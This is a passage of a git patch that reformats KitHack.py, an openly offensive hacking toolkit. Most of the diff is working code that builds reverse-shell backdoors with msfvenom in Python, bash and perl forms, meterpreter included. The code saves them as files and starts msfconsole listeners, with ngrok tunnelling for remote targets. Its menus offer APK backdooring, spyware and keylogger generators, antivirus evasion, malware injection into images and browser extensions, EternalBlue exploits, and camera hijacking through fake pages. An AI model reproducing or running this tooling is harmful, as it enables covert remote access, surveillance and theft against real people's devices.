LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '04': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '05': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/shell_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '06': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/shell_reverse_tcp_ssl LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '07': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/shell_reverse_udp LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_udp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif sys == '07': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} cmd/unix/reverse_bash'.format(WHITE, YELLOW)) - print ('{0}[02]{1} cmd/unix/reverse_bash_telnet_ssl'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash LHOST={0} LPORT={1} -f raw > output/{2}.sh'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.sh'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash_telnet_ssl LHOST={0} LPORT={1} -f raw > output/{2}.sh'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.sh'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif sys == '08': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} cmd/unix/reverse_perl'.format(WHITE, YELLOW)) - print ('{0}[02]{1} cmd/unix/reverse_perl_ssl'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl LHOST={0} LPORT={1} -f raw > output/{2}.pl'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.pl'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl_ssl LHOST={0} LPORT={1} -f raw > output/{2}.pl'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.pl'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif sys == 9: - LHOST = raw_input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = raw_input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - PAYLOAD = raw_input("\n{0}SET PAYLOAD: {1}".format(YELLOW, DEFAULT)) - if ".tcp.ngrok.io" in LHOST: - LHOST = "127.0.0.1" - LPORT = "443" - # continue - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"'.format(LHOST, LPORT, PAYLOAD)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif option == '11': - webbrowser.open("https://adrmxr.github.io/KitHack", new=1, autoraise=True) - os.system('clear') - main() - - elif option == '12': - pause("\n{}Press any key to exit...".format(GREEN)) - time.sleep(1) - os.system('clear') - print(exit_main) - exit(0) - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - os.system('clear') - main() if __name__ == "__main__": - try: - check_connection() - check_permissions() - main() - - except KeyboardInterrupt: - choice = input('\n\n{0}[1] {1}Return to KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}'.format(GREEN, DEFAULT, RED)) - choice = choice.zfill(2) - if choice == '01': - if os.path.isfile('/usr/local/bin/kithack'): - os.system('clear && kithack') - else: - os.system('clear && sudo python3 KitHack.py') - - elif choice == '02': - time.sleep(2) - os.system('clear') - print(exit_main) - exit(0) - else: - print("\n{}[x] INVALID OPTION.".format(RED)) - time.sleep(2) - exit(0) + try: + check_connection() + check_permissions() + main() + + except KeyboardInterrupt: + choice = input('\n\n{0}[1] {1}Return to KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}'.format( + GREEN, DEFAULT, RED)) + choice = choice.zfill(2) + if choice == '01': + if os.path.isfile('/usr/local/bin/kithack'): + os.system('clear && kithack') + else: + os.system('clear && sudo python3 KitHack.py') + + elif choice == '02': + time.sleep(2) + os.system('clear') + print(exit_main) + exit(0) + else: + print("\n{}[x] INVALID OPTION.".format(RED)) + time.sleep(2) + exit(0) From 7194330d9284531bd09a8efe4b87e4590455a779 Mon Sep 17 00:00:00 2001 From: "Restyled.io" Date: Sat, 26 Feb 2022 22:14:17 +0000 Subject: [PATCH 3/6] Restyled by black --- KitHack.py | 7264 ++++++++++++++++++++++++++++++++++------------------ 1 file changed, 4821 insertions(+), 2443 deletions(-) diff --git a/KitHack.py b/KitHack.py index fe68965..ac4eb7f 100755 --- a/KitHack.py +++ b/KitHack.py @@ -17,10 +17,22 @@ import time import subprocess import sys -BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = '\33[94m', '\033[91m', '\33[97m', '\033[36m', '\033[0m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m', '\033[1m' - -def check_connection(host='https://www.google.com'): +BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = ( + "\33[94m", + "\033[91m", + "\33[97m", + "\033[36m", + "\033[0m", + "\33[93m", + "\033[1;35m", + "\033[1;32m", + "\033[0m", + "\033[1m", +) + + +def check_connection(host="https://www.google.com"): print("{}Checking your internet connection...".format(GREEN)) time.sleep(0.5) try: @@ -38,17 +50,20 @@ def check_permissions(): if os.getuid() == 0: info() else: - os.system('clear') - print("{0}[!]{1} ¡Permission denied! Remember to run: {2}sudo {1}python3 KitHack.py".format( - RED, DEFAULT, GREEN)) + os.system("clear") + print( + "{0}[!]{1} ¡Permission denied! Remember to run: {2}sudo {1}python3 KitHack.py".format( + RED, DEFAULT, GREEN + ) + ) exit(0) def info(): - os.system('clear') + os.system("clear") print("{0}[VERSION]:{1} 1.3.2\n\n".format(RED, DEFAULT)) time.sleep(0.5) - os.system('clear') + os.system("clear") def main(): @@ -56,5277 +71,7637 @@ def main(): option = input("{0}KitHack >> {1}".format(RED, DEFAULT)) option = option.zfill(2) - if option == '01': - os.system('clear') - print('========={0}Tool{1}==================================={0}Information{1}================================'.format( - GREEN, DEFAULT)) - print('{0}01){1} Backdoor-apk {2}Add a backdoor to any APK file.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}02){1} Evil-Droid {2}Android Backdoor Generator Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}03){1} Spade {2}APK Backdoor Tool Made in Python.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}04){1} AhMyth {2}Android Remote Administration Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} Andspoilt {2}Run interactive Android exploits on Linux.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}06){1} Kwetza {2}Inject malware into existing Android apps.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}07){1} Termux {2}Linux based Android terminal emulator.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}08){1} Android-Exploits {2}Collection of Android exploits and hacks.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}09){1} Grabcam {2}Allows to hack the camera of our victims with a fake page.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}10){1} Androidpatternlock {2}Allows to get the pattern lock on Android devices.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + if option == "01": + os.system("clear") + print( + "========={0}Tool{1}==================================={0}Information{1}================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} Backdoor-apk {2}Add a backdoor to any APK file.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} Evil-Droid {2}Android Backdoor Generator Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}03){1} Spade {2}APK Backdoor Tool Made in Python.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}04){1} AhMyth {2}Android Remote Administration Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} Andspoilt {2}Run interactive Android exploits on Linux.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} Kwetza {2}Inject malware into existing Android apps.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}07){1} Termux {2}Linux based Android terminal emulator.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}08){1} Android-Exploits {2}Collection of Android exploits and hacks.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}09){1} Grabcam {2}Allows to hack the camera of our victims with a fake page.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}10){1} Androidpatternlock {2}Allows to get the pattern lock on Android devices.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.BackdoorApk() - elif tool == '02': + elif tool == "02": kitools.EvilDroid() - elif tool == '03': + elif tool == "03": kitools.Spade() - elif tool == '04': + elif tool == "04": kitools.AhMyth() - elif tool == '05': + elif tool == "05": kitools.Andspoilt() - elif tool == '06': + elif tool == "06": kitools.Kwetza() - elif tool == '07': + elif tool == "07": kitools.Termux() - elif tool == '08': + elif tool == "08": kitools.AndroidExploits() - elif tool == '09': + elif tool == "09": kitools.Grabcam() - elif tool == '10': + elif tool == "10": kitools.AndroidPatternLock() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '02': - os.system('clear') - print('========{0}Tool{1}================================================{0}Information{1}==================================='.format( - GREEN, DEFAULT)) - print('{0}01){1} Winpayloads {2}Undetectable payload generator in Windows.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}02){1} sAINT {2}Spyware generator for Windows systems.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}03){1} BeeLogger {2}Gmail Keylogger Generator for Windows.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}04){1} FakeImageExploiter {2}Inject malware into jpg images for Windows.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} Koadic {2}Post-Exploit Windows Rootkit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}06){1} Phantom Evasion {2}Antivirus Evasion Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}07){1} Ps1encode {2}PowerShell-based payload generator and encoder.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}08){1} DKMC {2}Malicious Payload Evasion Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}09){1} Cromos {2}Inject code into legitimate Chrome Web extensions.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}10){1} Eternal_scanner {2}Scanner for Eternal Blue and Eternal Romance exploit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}11){1} EternalblueDoublepulsar {2}Metasploit module to exploit the Eternalblue-Doublepulsar vulnerability.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}12){1} EternalBlueWinXPWin10 {2}Metasploit Module for EternalBlue from Windows XP SP2 to Windows 10 Pro.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}13){1} Windows-Exploits {2}Windows Exploits Collection.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + elif option == "02": + os.system("clear") + print( + "========{0}Tool{1}================================================{0}Information{1}===================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} Winpayloads {2}Undetectable payload generator in Windows.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} sAINT {2}Spyware generator for Windows systems.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}03){1} BeeLogger {2}Gmail Keylogger Generator for Windows.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}04){1} FakeImageExploiter {2}Inject malware into jpg images for Windows.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} Koadic {2}Post-Exploit Windows Rootkit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} Phantom Evasion {2}Antivirus Evasion Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}07){1} Ps1encode {2}PowerShell-based payload generator and encoder.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}08){1} DKMC {2}Malicious Payload Evasion Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}09){1} Cromos {2}Inject code into legitimate Chrome Web extensions.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}10){1} Eternal_scanner {2}Scanner for Eternal Blue and Eternal Romance exploit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}11){1} EternalblueDoublepulsar {2}Metasploit module to exploit the Eternalblue-Doublepulsar vulnerability.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}12){1} EternalBlueWinXPWin10 {2}Metasploit Module for EternalBlue from Windows XP SP2 to Windows 10 Pro.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}13){1} Windows-Exploits {2}Windows Exploits Collection.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.Winpayloads() - elif tool == '02': + elif tool == "02": kitools.sAINT() - elif tool == '03': + elif tool == "03": kitools.BeeLogger() - elif tool == '04': + elif tool == "04": kitools.FakeImageExploiter() - elif tool == '05': + elif tool == "05": kitools.Koadic() - elif tool == '06': + elif tool == "06": kitools.PhantomEvasion() - elif tool == '07': + elif tool == "07": kitools.Ps1encode() - elif tool == '08': + elif tool == "08": kitools.DKMC() - elif tool == '09': + elif tool == "09": kitools.Cromos() - elif tool == '10': 